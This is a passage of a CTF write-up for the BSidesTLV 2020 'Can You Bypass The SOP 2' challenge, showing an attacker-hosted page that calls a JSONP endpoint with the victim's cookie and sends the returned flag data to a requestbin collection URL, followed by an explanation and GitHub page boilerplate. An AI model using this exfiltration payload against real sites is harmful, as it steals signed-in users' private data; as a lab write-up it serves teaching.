class="pl-c1">type</span>="<span class="pl-s">hidden</span>" <span class="pl-c1">name</span>="<span class="pl-s">data</span>" <span class="pl-c1">value</span>="<span class="pl-s">template</span>" <span class="pl-c1">id</span>="<span class="pl-s">input</span>" /> <span class="pl-kos"><</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-en">$</span><span class="pl-kos">(</span><span class="pl-smi">document</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">ready</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">{</span> <span class="pl-s1">$</span><span class="pl-kos">.</span><span class="pl-en">ajax</span><span class="pl-kos">(</span><span class="pl-kos">{</span> <span class="pl-c1">dataType</span>: <span class="pl-s">'jsonp'</span><span class="pl-kos">,</span> <span class="pl-c1">jsonp</span>: <span class="pl-s">'callback'</span><span class="pl-kos">,</span> <span class="pl-c1">url</span>: <span class="pl-s">'https://can-you-bypass-the-sop.ctf.bsidestlv.com/FetchUserInfo?callback=?'</span><span class="pl-kos">,</span> <span class="pl-en">success</span>: <span class="pl-k">function</span> <span class="pl-kos">(</span><span class="pl-s1">data</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-c">/let http = new XMLHttpRequest()</span> <span class="pl-c"> http.open('POST', 'https://requestbin.net/r/w4xs0xw4', true);</span> <span class="pl-c"> http.setRequestHeader('Content-type', 'application/json');</span> <span class="pl-c"> http.send(JSON.stringify(data));/</span> <span class="pl-k">var</span> <span class="pl-s1">input</span> <span class="pl-c1">=</span> <span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-en">getElementById</span><span class="pl-kos">(</span><span class="pl-s">"input"</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-smi">console</span><span class="pl-kos">.</span><span class="pl-en">log</span><span class="pl-kos">(</span><span class="pl-s1">data</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">input</span><span class="pl-kos">.</span><span class="pl-c1">value</span> <span class="pl-c1">=</span> <span class="pl-s1">data</span><span class="pl-kos">.</span><span class="pl-c1">flag</span><span class="pl-kos">;</span> <span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-c1">forms</span><span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">.</span><span class="pl-en">submit</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos"></</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">html</span><span class="pl-kos">></span></pre></div> <p dir="auto">What this does is call the JSONP enabled endpoint, the same one that the original website does, as soon as the web page loads. Because the token cookie is not secured as mentioned before, if the user that navigates to this malicious URL is already signed into the <code>https://can-you-bypass-the-sop.ctf.bsidestlv.com</code>, the browser will do them a "favor" and send the token cookie along with the request ensuring that they will not need to log in again. Once the request from this endpoint returns, it will bring back the response from the JSONP endpoint with the object now in the logged in user's context. So, if someone that isn't <code>Logged in as guest</code> were to click on this link, they will have their own data object returned in the JSONP response.</p> <p dir="auto">Once we get that data back, the code can then append it as a URL parameter to GET request to our requestbin that is waiting for us which is what the success function does. It assigns the flag parameter as the hidden input value of our form and then submits it, effectively submitting a GET request to our hosted requestbin endpoint.</p> <p dir="auto">Pasting in our malicious URL that is hosted by repl.it to the BOT, we then wait a few moments and check our requestbin to find our flag waiting for us.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="/trott4425/CTF-Writeups/blob/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/flag.png"><img src="/trott4425/CTF-Writeups/raw/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202/flag.png" alt="flag" style="max-width: 100%;"></a></p> </article> </div> </div>

</readme-toc>

</div>

</turbo-frame>

</main>

</div>

      <footer class="footer width-full container-xl p-responsive" role="contentinfo">

<h2 class='sr-only'>Footer</h2>

<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <a aria-label="Homepage" title="GitHub" class="footer-octicon mr-2" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path> </svg> </a> <span> © 2023 GitHub, Inc. </span> </div> </div>

<nav aria-label='footer' class="col-12 col-lg-8">
  <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3>
  <ul class="list-style-none d-flex flex-wrap col-12 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0" aria-labelledby='sr-footer-heading'>
      <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/site-policy/github-terms/github-terms-of-service" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to terms&quot;,&quot;label&quot;:&quot;text:terms&quot;}">Terms</a></li>
      <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to privacy&quot;,&quot;label&quot;:&quot;text:privacy&quot;}">Privacy</a></li>
      <li class="mr-3 mr-lg-0"><a data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to security&quot;,&quot;label&quot;:&quot;text:security&quot;}" href="https://github.com/security">Security</a></li>
      <li class="mr-3 mr-lg-0"><a href="https://www.githubstatus.com/" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;}">Status</a></li>
      <li class="mr-3 mr-lg-0"><a data-ga-click="Footer, go to help, text:Docs" href="https://docs.github.com">Docs</a></li>
      <li class="mr-3 mr-lg-0"><a href="https://support.github.com?tags=dotcom-footer" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to contact&quot;,&quot;label&quot;:&quot;text:contact&quot;}">Contact GitHub</a></li>
      <li class="mr-3 mr-lg-0"><a href="https://github.com/pricing" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Pricing&quot;,&quot;label&quot;:&quot;text:Pricing&quot;}">Pricing</a></li>
    <li class="mr-3 mr-lg-0"><a href="https://docs.github.com" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to api&quot;,&quot;label&quot;:&quot;text:api&quot;}">API</a></li>
    <li class="mr-3 mr-lg-0"><a href="https://services.github.com" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to training&quot;,&quot;label&quot;:&quot;text:training&quot;}">Training</a></li>
      <li class="mr-3 mr-lg-0"><a href="https://github.blog" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to blog&quot;,&quot;label&quot;:&quot;text:blog&quot;}">Blog</a></li>
      <li><a data-ga-click="Footer, go to about, text:about" href="https://github.com/about">About</a></li>
  </ul>
</nav>

</div>

<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> You can’t perform that action at this time. </div>

<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. <a href="">Reload</a> to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template>

<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0">

<template id="snippet-clipboard-copy-button">

</div>

<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div>

</body> </html>

Original writeup (https://github.com/trott4425/CTF-Writeups/tree/master/BSidesTLV-2020/web/Can%20You%20Bypass%20The%20SOP%202).

Can You Bypass The SOP 2?

Comments

Sign in with